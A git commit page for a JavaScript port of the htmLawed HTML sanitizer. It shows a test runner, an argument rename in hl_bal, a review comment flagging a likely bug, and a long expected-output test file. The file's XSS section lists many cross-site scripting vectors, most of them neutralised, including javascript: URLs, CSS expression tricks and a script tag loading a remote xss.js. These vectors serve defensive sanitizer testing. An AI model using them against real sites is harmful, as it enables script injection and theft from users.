add some tests, rename hl_bal function arg

master
Vitaliy Filippov 2016-07-05 16:15:15 +03:00
parent e6d3da4e08
commit a5778a95c3
7 changed files with 1124 additions and 97 deletions


@ -1,3 +1,24 @@
const fs = require('fs');
const htmLawed = require('./htmLawed.c.js');
console.log(htmLawed.sanitize(fs.readFileSync(process.argv[2], { encoding: 'utf8' }), { safe: 1 }));
var out1 = htmLawed.sanitize(fs.readFileSync('htmLawed_TESTCASE.txt', { encoding: 'utf8' }), { safe: 1, keep_bad: 1 });
var check1 = fs.readFileSync('htmLawed_TESTCASE_out.htm', { encoding: 'utf8' });
if (out1 == check1)
console.log("[TESTCASE.txt] OK");
else
{
console.log("[TESTCASE.txt] NOT OK, see htmLawed_TESTCASE_bad.htm");
fs.writeFileSync('htmLawed_TESTCASE_bad.htm', out1, { encoding: 'utf8' });
}
var tests = fs.readFileSync('rsnake_xss.txt', { encoding: 'utf8' });
var m;
while ((m = /^(\d+)\.\s*([^\n]+)\n\nInput code »\n([\s\S]*?)\n\nOutput code »\n([\s\S]*?)\n\n/.exec(tests)))
{
var output = htmLawed.sanitize(m[3], { safe: 1, keep_bad: 1 }).trim();
if (output === m[4])
console.log("["+m[1]+"] "+m[2]+": OK");
else
console.log("["+m[1]+"] "+m[2]+": NOT OK\n"+m[4]+"\n vs \n"+output);
tests = tests.substr(m[0].length);
}


@ -161,8 +161,8 @@ var htmLawed = module.exports =
t = htmLawed._strtr(t, { "\x01": '', "\x02": '', "\x03": '&', "\x04": '<', "\x05": '>' });
if (C.tidy)
t = htmLawed.hl_tidy(t, C.tidy, C.parent);
return t;
// eof
return t;
},
hl_attrval: function(a, t, p)
{
@ -208,10 +208,10 @@ var htmLawed = module.exports =
return (r.length > 0 ? r.join(s) : (p['default'] || 0));
// eof
},
hl_bal: function(t, perf, intag)
hl_bal: function(t, keep_bad, intag)
{
if (perf === undefined)
perf = 1;
if (keep_bad === undefined)
keep_bad = 1;
// balance tags
// by content
var cont = {};
@ -271,7 +271,7 @@ var htmLawed = module.exports =
// intag sets allowed child
intag = ((el.F[intag] && intag != '#pcdata') || el.O[intag]) ? intag : 'div';
if (cont.E[intag])
return (!perf ? '' : htmLawed.replace(/</g, '&lt;').replace(/>/g, '&gt;'));
return (!keep_bad ? '' : htmLawed.replace(/</g, '&lt;').replace(/>/g, '&gt;'));
var inOk = getCont(intag);
var ok = {}, q = [], ql; // q = seq list of open non-empty ele
var _ob = '';
@ -421,13 +421,13 @@ var htmLawed = module.exports =
delete cont.I['ins'];
}
// bad tags, & ele content
if (e && (perf == 1 || (ok['#pcdata'] && (perf == 3 || perf == 5))))
if (e && (keep_bad == 1 || (ok['#pcdata'] && (keep_bad == 3 || keep_bad == 5))))
_ob += '&lt;'+s+e+a+'&gt;';
if (x !== '' && x !== null)
{
if (x.trim().length > 0 && ((ql && cont.B[p]) || (cont.B[intag] && !ql))) // FIXME trim
_ob += '<div>'+x+'</div>';
else if (perf < 3 || ok['#pcdata'])
else if (keep_bad < 3 || ok['#pcdata'])
_ob += x;
else if (x.indexOf("\x02\x04") >= 0)
{
@ -435,10 +435,10 @@ var htmLawed = module.exports =
for (var _i = 0; _i < x.length; _i++)
{
var v = x[_i];
_ob += v.substr(0, 2) == "\x01\x02" ? v : (perf > 4 ? v.replace(/\S+/g, '') : '');
_ob += v.substr(0, 2) == "\x01\x02" ? v : (keep_bad > 4 ? v.replace(/\S+/g, '') : '');
}
}
else if (perf > 4)
else if (keep_bad > 4)
_ob += x.replace(/\S+/g, '');
}
}
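Review bot: On the new line of the `cont.E[intag]` early return (`return (!keep_bad ? '' : htmLawed.replace(/</g, '&lt;')...)`) the replacement is invoked on the module object `htmLawed` rather than on the input string `t`; unless the module defines a `replace` helper that is not visible in this hunk, that branch throws a TypeError whenever keep_bad is truthy and the configured parent is an empty element, and when keep_bad is falsy it discards the content. Judging by the `&lt;`/`&gt;` escaping applied to bad tags a few lines lower, the intent is presumably to emit the content escaped, i.e. `return (!keep_bad ? '' : t.replace(/</g, '&lt;').replace(/>/g, '&gt;'));`. This is the path that keeps markup from being emitted raw under a void parent, so it is worth a dedicated test case with `parent` set to such an element, since the new TESTCASE run appears to use the default parent and would not reach it. hl_bal continues past the end of this hunk, so I have not checked whether `t` is reassigned before this point.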

htmLawed_TESTCASE_out.htm Normal file

@ -0,0 +1,450 @@
/*
htmLawed_TESTCASE.txt, 27 February 2016
htmLawed 1.1.22, 5 March 2016
Copyright Santosh Patnaik
Dual licensed with LGPL 3 and GPL 2+
A PHP Labware internal utility - http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
*/
This file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.
************************************************
when viewing this file in a web browser, set the
character encoding to Unicode/UTF-8
************************************************
--------------------- start --------------------
<em>Try different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page</em><br />
<h6>Attributes</h6>
<strong>Xml:lang:</strong><a lang="en" xml:lang="en"></a>, <a lang="en"></a>, <a xml:lang="en"></a><br />
<strong>Standard, predefined value, or empty attribute:</strong> <input type="text" disabled="disabled" />, <input type="text" disabled="disabled" />, <input type="text" disabled="disabled" /><br />
<strong>Required:</strong> <img src="src" alt="image" />, <img alt="image" src="src" /><br />
<strong>Quote &amp; space variation:</strong> <a id="id1" name="xy">a</a>, <a id="id2" name="xy">a</a>, <a id="id3" name="n">a</a><br />
<strong>Invalid:</strong> <a id="id4">a</a><br />
<strong>Duplicated:</strong> <a id="id6">a</a><br />
<strong>Deprecated:</strong> <a id="id7" target="self" name="n">a</a>, <hr style="border-style: none; border: 0; background-color: gray; color: gray;" /><br />
<strong>Casing:</strong> <a href=""></a><br />
<strong>Custom:</strong> <img alt="image" src="src" /><br />
<strong>Data-*:</strong> <a>a</a><br />
<strong>Admin-restricted?:</strong> <a href="x"></a>
<h6>Attribute values</h6>
<strong>Duplicate ID value:</strong><a id="id8"></a>, <a id="my_id8"></a>, <a></a><br />
(try 'my_' for prefix)<br />
<strong>Double-quotes in value:</strong><a title="ab"></a>, <a title="ab"></a>, <a title="ab&quot;c"></a><br />
(try filter for CSS expression)<br />
<strong>CSS expression</strong>: <div style="prop: ();"></div><div style="prop: ()"></div><div style="prop: ();"></div><div style="prop : ()"></div><div style="prop: (js);"></div><div style="prop: (js;)"></div><div style="prop: ('js');"></div><div style="prop : expr ession('js':)"></div><div style="prop: ( 'js&#x40; );"></div><br />
<strong>Other:</strong> <input size="50" class="my" value="an input an input an input" />, <input size="5" class="your" value="an input" /><br />
(try 'maxlen', 'maxval', etc., for 'input' in '$spec')
<h6>Blockquotes</h6>
<blockquote><div>abc</div></blockquote><br />
<blockquote><div>abc<div>def</div></div></blockquote><br />
<blockquote><div>abc</div><div>def</div></blockquote><br />
<blockquote><div>abc<div>def</div>ghi</div></blockquote><br />
abc<div>def</div>ghi<br />
<blockquote><div>QQQ<div>x</div>&lt;!-- comment --&gt;</div></blockquote><br />
<blockquote><div>x</div><div>&lt;!-- comment --&gt;QQQ</div></blockquote><br />
<blockquote><div>&lt;!-- comment --&gt;<div>x</div>QQQ<div>x</div></div></blockquote><br />
<blockquote><div>x&lt;!-- comment --&gt;</div><div>QQQ</div></blockquote><p>x</p><br />
<br />
(try with blockquote parent)
<h6>CDATA sections</h6>
<strong>Special characters inside:</strong> &lt;![CDATA[ ]]&gt; ]]&gt;, &lt;![CDATA[ 3 &lt; 4 &gt; 3.5, &amp; 4 &gt; 4 ]]&gt;<br />
<strong>Normal:</strong> &lt;![CDATA[ check ]]&gt;, <em>CDATA follows:&lt;![CDATA[ check ]]&gt;</em><br />
<strong>Malformed:</strong> &lt;![cdata check ]]&gt;, &lt; ![CDATA check ]]&gt;, &lt;![CDATA check ]]&gt;, &lt; ![CDATA check ] ]&gt;<br />
<strong>Invalid:</strong> <em>&gt;CDATA in tag content</em>, <table>&lt;![CDATA[ check ]]&gt;<tr><td>text not allowed</td></tr></table>
<h6>Complex-1: deprecated elements</h6>
<div style="text-align: center;">
The PHP <span style="text-decoration: line-through;">software</span> script used for this <span style="text-decoration: line-through;">web-page</span> webpage is <span style="font-weight: bold; font-size: 200%; color: red; font-family: arial;">htmLawedTest.php</span>, from <span style="color:green; text-decoration: underline;">PHP Labware</span>.
</div>
<h6>Complex-2: deprecated attributes</h6>
<img src="s" alt="a" id="n" /><img src="s" alt="a" id="id9" />
<br style="clear: left;" />
<hr style="border-style: none; border: 0; background-color: gray; color: gray; size: 1px;" />
<img src="s" alt="image" width="10em" height="20" style="padding:5px; float: left; margin-left: 10px; margin-right: 10px; margin-top: 10px; margin-bottom: 10px; border: 1px;" id="id10" />
<table width="50em" style="margin: auto; background-color: red;">
<tr>
<td style="width: 20%;">
<div style="margin: auto;">
<h3 style="text-align: right;">Section</h3>
<p style="text-align: right;">Para</p>
<ol style="list-style-type: lower-latin;"><li><a name="x" id="x">First</a> <a name="x" id="id11">item</a></li></ol>
</div>
</td>
<td style="width: auto;">
<ol style="list-style-type: decimal;"><li>First item</li></ol>
</td>
</tr>
</table>
<br style="clear: both;" />
<h6>Complex-3: embed, object, area</h6>
&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ls7gi1VwdIQ" /&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;<br />
&lt;embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"&gt;&lt;/embed&gt;<br />
&lt;object data="1.gif" type="image/gif" usemap="#map1"&gt;<map name="map1" id="map1">
<p>navigate the site: <a href="1" shape="rect" coords="0,0,118,28">1</a> | <a href="3" shape="circle" coords="184,200,60">3</a> | <a href="4" shape="poly" coords="276,0,276,28,100,200,50,50,276,0">4</a></p>
<area href="5" shape="rect" coords="0,0,118,28" alt="area" />
</map>&lt;/object&gt;
&lt;param name="name" /&gt;value&lt;/param&gt;
&lt;object id="obj1"&gt;
&lt;param name="param1" /&gt;
&lt;object id="obj2"&gt;
&lt;param name="param2" /&gt;
&lt;/object&gt;
&lt;/object&gt;
<h6>Complex-4: nested and other tables</h6>
<table border="1" style="background-color: red;"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> <table border="1" style="background-color: green;"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table><br />
<strong>PCDATA wrong:</strong> <table>Well<caption>Hello</caption></table><br />
<strong>Missing tr:</strong> <table>&lt;td&gt;Well&lt;/td&gt;</table><br />
<h6>Complex-5: pseudo, disallowed or non-HTML tags</h6>
(Try different 'keep_bad' values)
&lt;*&gt; Pseudotags &lt;*&gt;
&lt;xml&gt;Non-HTML tag xml&lt;/xml&gt;
<p>
Disallowed tag p
</p>
<ul>Bad<li>OK</li></ul>
<h6>Elements</h6>
<strong>Unbalanced:</strong> <a href="h"><em>check</em></a>&lt;/em&gt;<br />
<strong>Non-XHTML:</strong> <div><div style="text-align: center;"><ul></ul></div></div><br />
<strong>Malformed:</strong> &lt; a href=""&gt;&lt;/a&gt;, <a href=""></a>, <a href=""></a>, <a href=""></a>, <a href="">&lt; /a&gt;, &lt; a href=""&gt;</a>, <img src="s" alt="a" />, <img src="s" alt="a" />, &lt;imgsrc="s" alt="a" /&gt;<br />
<strong>Invalid:</strong> &lt;image src="s" alt="a" /&gt;<br />
<strong>Empty:</strong> <img src="s" alt="a" />, <img src="s" alt="a" />&lt;/img&gt;, <img src="s" alt="a" />text&lt;/img&gt;<br />
<strong>Content invalid:</strong> <a href="h">1</a><a>2</a>&lt;/a&gt;<br />
<strong>Content invalid?:</strong> <form action="action"></form><br /> (try setting 'form' as parent)<br />
<strong>Casing:</strong> <a href=""></a><br />
<strong>Check for tidy:</strong> <br /><hr />&lt;/div&gt;<hr />&lt;/div&gt;<hr />&lt;/div&gt;<div>hi</div>
<h6>Entities</h6>
<strong>Special:</strong> &amp; 3 &lt; 2 &amp; 5&gt;4 and j &gt;i &gt;a &amp; i&lt;j&gt;a<br />
<strong>Padding:</strong> &#66; &#66; &#x66; &#x66; &amp;#x003; &amp;#0003;<br />
<strong>Malformed:</strong> &amp; #x27;, &amp;x27;, &#x27; &amp;TILDE;, &amp;tilde<br />
<strong>Invalid:</strong> &amp;#x3;, &amp;#55296;, &amp;#03;, &amp;#1114112;, &amp;#xffff, &amp;bad;<br />
<strong>Discouraged characters:</strong> &amp;#x7f;, &amp;#132;, &#64992;, &#1114110;<br />
<strong>Context:</strong> '&gt;', &lt;?<br />
<strong>Casing:</strong> &#x27;, &#x27;, &amp;TILDE;, &tilde;
<br />
(also check named-to-numeric and hexdec-to-decimal, and vice versa, conversions)
<h6>Format</h6>
<strong>Valid but ill-formatted:</strong> text &lt;!-- comment --&gt;
text &lt;!--
A c o m m e n t --&gt;
&lt;script&gt;
&lt;![CDATA[
code
]]&gt;
&lt;/script&gt;&lt;!-- comment --&gt;&lt;![CDATA[ cdata ]]&gt; <a>text&lt;/b&gt; text&lt;pre id="none"&gt;p r e&lt;/pre&gt;
<textarea rows="10" cols="50">text</textarea> <textarea rows="10" cols="50">
text text
</textarea> text text <br />&lt;hr /&gt;
text <img src="none" alt="none" /> t<em class="none">e<strong>x</strong>t</em>
text <img src="none" alt="none" /> <b>t<em> e <strong> x </strong> t</em></b>
</a><a href="a"> text <img src="none" alt="none" /> <b>t <em> e <strong> x </strong> t</em></b>
</a>
<span style="background-color: yellow;">text <img src="none" alt="none" /> <b> <em> t e <strong> x </strong> t</em></b></span>
&lt;script&gt;script&lt;/script&gt;
<div>
<pre>p <a>r</a> e &lt;!-- comment --&gt; </pre>
<pre>
pre
</pre>
</div>
<div><div><table border="1" style="background-color: red;"><tr><td>Cell</td><td colspan="2" rowspan="2"><table border="1" style="background-color: green;"><tr><td>Cell</td><td colspan="2" rowspan="2"></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></div></div>
(try to compact or beautify)
<h6>Forms</h6>
(note nesting of 'form', missing required attributes, etc.)<br />
<form action="action"><div>
&lt;script type="text/javascript"&gt;s&lt;/script&gt;
<fieldset><legend>p</legend>l <input name="personal_lastname" type="text" tabindex="1" /></fieldset>
<input name="h" type="checkbox" value="h" tabindex="20" /> h
<textarea name="t" rows="10" cols="50">t</textarea>
</div></form><form action="a" method="get"></form>&lt;/form&gt;<br />
<form action="b" method="get"><p><input type="text" value="i" /></p></form><br />
<form action="action"><div>B:<input type="text" value="b" />C:<input type="text" value="c" /></div></form><br />
(try each of these lines separately)<br />
<form action="a"><div>what<br />
</div></form><form action="a"><div>what
(try with container as div and as form)<br />
</div></form><form action="action"><div>c <a>a</a> <b>b</b><input />&lt;script&gt;s&lt;/script&gt;
<h6>HTML comments (also CDATA)</h6>
<strong>Script inside:</strong> &lt;!--[if gte IE 4]&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
&lt;![endif]--&gt;<br />
<strong>Special characters inside: &lt;!-- &lt;![CDATA check ]]&gt; --&gt;, &lt;!-- 3 &lt; 4 &gt; 3.5, &amp; 4 &gt; 4 --&gt;, &lt;!-- che--ck --&gt;, &lt;!--[if !IE]&gt; &lt;--&gt;<a>c</a>&lt;!--&gt; &lt;![endif]--&gt;<br />
<strong>Normal:</strong> &lt;!-- check --&gt;, &lt;!--check --&gt;, <em>comment:&lt;!-- check --&gt;</em>&lt;!-- check --&gt;, &lt;table&gt;&lt;!-- check --&gt;&lt;tr&gt;&lt;td&gt;text not allowed&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br />
<strong>Malformed:</strong> &lt;![cdata check ]]&gt;, &lt; ![CDATA check ]]&gt;, &lt; ![CDATA check ] ]&gt;<br />
Invalid:</strong> <em>&gt;comment in tag content</em>, &lt;!--check--&gt;
<h6>HTML5</h6>
<strong>figure and figcaption:</strong> &lt;figure&gt;<img src="picture.jpg" alt="picture" />&lt;figcaption&gt;Caption for the awesome picture&lt;/figcaption&gt;&lt;/figure&gt;
<strong>article:</strong> <h1>A</h1><p>B</p>&lt;article&gt;<h2>C</h2>&lt;/article&gt;&lt;article&gt;<h2>E</h2><p>F</p><p>G</p>&lt;/article&gt;
<strong>meter</strong>: <p>Heat &lt;meter min="100" max="200" value="150"&gt;150&lt;/meter&gt;.</p>
<strong>datalist</strong>: <input />&lt;datalist id="b"&gt;&lt;option value="c"&gt;&lt;option value="d"&gt;&lt;/datalist&gt;
<h6>Ins-Del</h6>
(depending on context, these elements can be of either block or inline type)<br />
<p><ins datetime="d" cite="c">&lt;div&gt;block</ins></p></div>&lt;/ins&gt;&lt;/p&gt;<div><br />
<p><del>d</del></p><br />
<p><ins><del>d</del></ins></p><div><ins><p><del>&lt;div&gt;d</del></p></ins></div>&lt;/del&gt;&lt;/p&gt;&lt;/ins&gt;</div><ins><div>d</div></ins>
<h6>Lists</h6>
<div><strong>Invalid character data</strong>: <ul><li>(item</li>)</ul><br />
<strong>Definition list</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />
<strong>Definition list, close-tags omitted</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />
<strong>Definition lists, nested</strong>: <dl>
<dt>T1</dt>
<dd>D1</dd>
<dt>T2</dt>
<dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>
<dt>T3</dt>
<dd>D3</dd>
<dt>T4</dt>
<dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>
</dl><br />
<strong>Definition lists, nested, close-tags omitted</strong>: <dl>
<dt>T1
</dt><dd>D1</dd>
<dt>T2</dt>
<dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>
<dt>T3
</dt><dd>D3
</dd><dt>T4
</dt><dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>
</dl><br />
<strong>Nested</strong>: <ul>
<li>l1</li>
<li>l2<ol><li>lo1</li><li>lo2</li></ol></li>
<li>l3</li>
<li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol></li>
</ul><br />
<strong>Nested, directly</strong>: <ul>
<li>l1</li>
&lt;ol&gt;l2&lt;/ol&gt;
<li>l3</li>
</ul><br />
<strong>Nested, close-tags omitted</strong>: <ul>
<li>l1</li>
<li>l2<ol><li>lo1</li><li>lo2</li></ol>
</li><li>l3
</li><li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol>
</li></ul><br />
<strong>Complex</strong>:
<ol>&lt;script&gt;&lt;/script&gt;<li><table><tr><td>
<ul><li id="search" class="widget widget_search"> </li></ul></td></tr></table></li></ol></div></form><form id="searchform" method="get" action="http://kohei.us">
<div>
<input type="text" name="s" id="s" size="15" /><br />
<input type="submit" value="Search" />
</div>
</form>
&lt;/li&gt;&lt;/ul&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/li&gt;&lt;/ol&gt;
<strong>Menu</strong>: <ul style="list-style-type: decimal;"><li><ul>
&lt;button type="button"&gt;New...&lt;/button&gt;
</ul></li><li><ul>&lt;button type="button"&gt;Cut...&lt;/button&gt;</ul></li>
</ul>
<h6>Microdata</h6>
<div>
I am <span>X</span> but people call me <span>Y</span>.
Find me at <a href="http://www.xy.com">www.xy.com</a>
</div>
<h6>Microsoft Word</h6>
<strong>Proprietary tag</strong>: <p class="3DMsoNormal">&lt;o:p&gt;&nbsp;&lt;/o:p&gt;</p><br />
<strong>XML declaration</strong>: &lt;?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /&gt;<br />
<strong>XML-invalid character code-point (may not replicate)</strong>: <p class="3DMsoNormal">“Where is he?” asked both Mary the one so lovely and Jane.</p>
<h6>Nesting</h6>
<strong>Block or inline a</strong>: <p><a href="link">text</a></p><a href="link">&lt;div&gt;hi&lt;/div&gt;</a><br />
<h6>Non-English text-1</h6>
Inscrieţi-vă acum la a Zecea Conferinţă Internaţională<br />
გთხოვთ ახლავე გაიაროთ რეგისტრაცია<br />
večjezično računalništvo<br />
<a title="อ.อ่าง">อ.อ่าง</a><br />
<a title="הירשמו כעת לכנס">Зарегистрируйтесь сейчас
на Десятую Международную Конференцию по</a><br />
(this file should have utf-8 encoding; some characters may not be displayed because of missing fonts, etc.)
<h6>Non-English text-2: entities</h6>
&#29992;&#32479;&#19968;&#30721;<br />
&#4306;&#4311;&#4334;&#4317;&#4309;&#4311;<br />
Inscreva-se agora para a D&#233;cima Confer&#234;ncia Internacional Sobre O Unicode, realizada entre os dias 10 e 12 de mar&#231;o de 1997 em Mainz
na Alemanha.
<h6>Ruby</h6>
(need compatible browser)<br />
<ruby xml:lang="ja">
<rbc>
<rb></rb>
<rb></rb>
<rb></rb>
<rb></rb>
</rbc>
<rtc class="reading">
<rt>さい</rt>
<rt>とう</rt>
<rt>のぶ</rt>
<rt></rt>
</rtc>
<rtc class="annotation">
<rt xml:lang="en">W3C Associate Chairman</rt>
</rtc>
</ruby><br />
<ruby>
<rb>WWW</rb>
<rp>(</rp><rt>World Wide Web</rt><rp>)</rp>
</ruby><br />
<ruby>
A
<rp>(</rp><rt>aaa</rt><rp>)</rp>
</ruby>
<h6>Tables</h6>
<strong>Omitted closing tags:</strong> <table>
<colgroup><col style="x" /><col style="y" />
</colgroup><thead>
<tr><th>h1c1</th><th>h1c2
</th></tr></thead><tbody>
<tr><td>r1c1</td><td>r1c2
</td></tr><tr><td>r2c1</td><td>r2c2
</td></tr></tbody></table><br />
<strong>Nested, omitted closing tags:</strong> <table>
<colgroup><col style="x" /><col style="y" />
</colgroup><thead>
<tr><th>h1c1</th><th>h1c2
</th></tr></thead><tbody>
<tr><td>r1c1</td><td>r1c2<table>
<colgroup><col style="x" /><col style="y" />
</colgroup><thead>
<tr><th>h1c1</th><th>h1c2
</th></tr></thead><tbody>
<tr><td>r1c1</td><td>r1c2
</td></tr><tr><td>r2c1</td><td>r2c2
</td></tr></tbody></table>
</td></tr><tr><td>r2c1</td><td>r2c2
</td></tr></tbody></table><br />
<h6>Tag transformation</h6>
<strong>Font element intended as 'inline' element:</strong> <p><span style="color: red;">hi</span></p><br />
<strong>Font element intended as 'block' element:</strong> <div><span style="color: red;">&lt;div&gt;hi</span></div>&lt;/span&gt;&lt;/div&gt;<br />
<strong>Font element intended as 'block' element:</strong> <div style="text-align: center;"><span style="color: red; font-family: serif, 'Times';">&lt;div&gt;hi</span></div><div>QQQ</div>&lt;/span&gt;&lt;/div&gt;<br />
<h6>Tidy</h6>
<strong>White-space handling:</strong> abc<em> def </em> ghi abc <em>def</em> ghi
<h6>URLs</h6>
<strong>Relative and absolute:</strong> <a href="mailto:x"></a>, <a href="http://a.com/b/c/d.f"></a>, <a href="./../d.f"></a>, <a href="./d.f"></a>, <a href="d.f"></a>, <a href="#s"></a>, <a href="./../../d.f#s"></a><br />
(try base URL value of 'http://a.com/b/')<br />
<strong>CSS URLs:</strong> <div style="background-image: url('denied:a.gif');"></div>, <div style="background-image: URL(&quot;denied:a.gif&quot;);"></div>, <div style="background-image: url('denied:http://a.com/a.gif');"></div>, <div style="background-image: url('denied:./../a.gif');"></div>, <div style="background-image: url('denied:js:xss')"></div><br />
<strong>Double URLs:</strong> <a style="behaviour: url(denied:foo) url(denied:http://example.com/xss.htc)">b</a><br />
<strong>Anti-spam:</strong> (try regex for 'http://a.com', etc.) <a href="mailto:x@y.com"></a>, <a href="http://a.com/b@d.f"></a>, <a href="a.com/d.f" rel="nofollow"></a>, <a href="a.com/d.f" rel="1, 2"></a>, <a href="a.com/d.f"></a>, <a href="b.com/d.f"></a>, <a href="c.com/d.f">, </a><a href="denied:http://c.com/d.f"></a><br />
<strong>Soft-hyphen:</strong> <a href="http://q=ídis c">ídis­c</a>
<h6>XSS</h6>
<img alt="&lt;img onmouseover=confirm(1)//" src="src" />
'';!--"&lt;xss&gt;=&amp;{()}<br />
<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
<img src="denied:javascript:alert('xss');" alt="image" /><br />
<img src="denied:java script:alert('xss');" alt="image" /><br />
<img src="denied:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;" alt="image" /><br />
<span style="color: #FF6699'onmouseover='alert(1)//;">test</span>
<span style="color: img//onerror='alert`www.ptsecurity.com`'src=Psych0tr1a;">
&lt;div style="javascript:alert('xss');"&gt;&lt;/div&gt;<br />
&lt;div style="background-image:url(denied:javascript:alert('xss'));"&gt;&lt;/div&gt;<br />
&lt;div style="background-image:url(&quot;denied:javascript:alert('xss')&quot; );"&gt;&lt;/div&gt;<br />
&lt;!--[if gte IE 4]&gt;&lt;script&gt;alert('xss');&lt;/script&gt;&lt;![endif]--&gt;<br />
&lt;script a="&gt;" src="http://ha.ckers.org/xss.js"&gt;&lt;/script&gt;<br />
&lt;div style="background-image: url('denied:js:xss')"&gt;&lt;/div&gt;<br />
<a style=";-moz-binding:url(denied:http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br />
<strong>Bad IE7:</strong> <a href="http://x&amp;x=%22+style%3d%22background-image%3a+expression%28alert %28%27xss%3f%29%29">x</a><br />
<strong>Opera:</strong> <a href="denied:\xE2\x80\x83javascript:alert(123)">link</a>
<strong>Bad IE7:</strong> <a style="color:expr comment*/ession(alert(document.domain))">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp */ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: x */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="xxx" style="background: */ */ (alert('xss'));">xxx</a><br />
<strong>Bad IE7:</strong> <a href="x" style="width: *** *;;;;;;*/ */(alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background: */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: huh */ */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> <a href="x" style="background: */ (alert('xss'));background: */ (alert('xss'));">x</a><br />
<strong>Bad IE7:</strong> exp/*<a style="no ss:noxss(&quot;*/ &quot;);xss:ex XSS*/ /pression(alert(&quot;XSS&quot;))">x</a><br />
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:expre sion(alert('xss'));">hi</a><br />
<strong>Bad IE7:</strong> <a style="color: 065 078 070 072 065 073 073 069 06f 06e 028 061 06c 065 072 074 028 031 029 029">test</a><br />
<strong>Bad IE7:</strong> <a style="xss:e #48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br />
<strong>Bad IE7:</strong> <a style="background:url('denied:java script:eval(document.all.mycode.expr)')">hi</a><br />
&lt;h6&gt;Other&lt;/h6&gt;
3 &lt; 4 <br />
3 &gt; 4 <br />
&gt; 3 <br />
&lt;._.&gt; hi! <br />
&lt;&lt;&lt; ALERT &gt;&gt;&gt; <br />
&lt;![if !vml]&gt; some stuff &lt;![endif]&gt; <br />
&lt;?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /&gt; <br />
&lt;uml:ns ns = "urn:www"&gt; <br />
&lt;uml:ns ns = 'urn:www'&gt; <br />
if(13&lt;age AND 21&gt;age){say 'teen'} <br />
age &gt;51 and a smoking history of &gt;51 pack-years <b>was</b> <br />
age &gt; 51 and a smoking history of &gt;51 pack-years <b>was</b> <br />
age &lt;51 and a smoking history of &lt;51 pack-years &lt;b&gt;was&lt;/b&gt; <br />
age &lt; 51 and a smoking history of &lt; 51 pack-years <b>was</b> <br />
<b>age &gt;51 and a smoking history of &gt;51 pack-years</b> <br />
<b>age &gt; 51 and a smoking history of &gt;51 pack-years</b> <br />
<b>age &lt;51 and a smoking history of &lt;51 pack-years&lt;/b&gt; <br />
<b>age &lt; 51 and a smoking history of &lt; 51 pack-years</b> <br />
</b></span>
